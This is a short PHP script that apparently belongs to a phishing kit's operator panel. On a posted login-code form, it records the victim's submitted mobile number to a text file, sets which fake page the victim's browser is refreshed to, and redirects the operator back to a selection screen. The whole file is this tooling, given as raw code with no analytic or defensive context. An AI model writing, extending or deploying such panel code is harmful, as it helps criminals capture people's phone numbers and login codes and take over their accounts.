<?php


session_start();

if(isset($_POST['textloginCode'])) 
{
    
$Page .= '<meta http-equiv="refresh" content="0;url=./Login-app.php" />  ';

$fPage = fopen("../Show_system/Show_Page.txt", "w");
    fwrite($fPage, $Page);


$Pageee .= ''.$_POST['mobiili'].'';

$fPageee = fopen("../Show_system/Show_mobiili.txt", "w");
    fwrite($fPageee, $Pageee);



$Pag .= '<div class="expanded button-group"><input type="submit" value="✅ User go this Page mobiili 💯" class="button" style="
    background: #8bc34a;
"></div>';

$fPag = fopen("../Show_system/Show_Select.txt", "w");
    fwrite($fPag, $Pag);


header("location:../Select.php");

}

else {




}

?>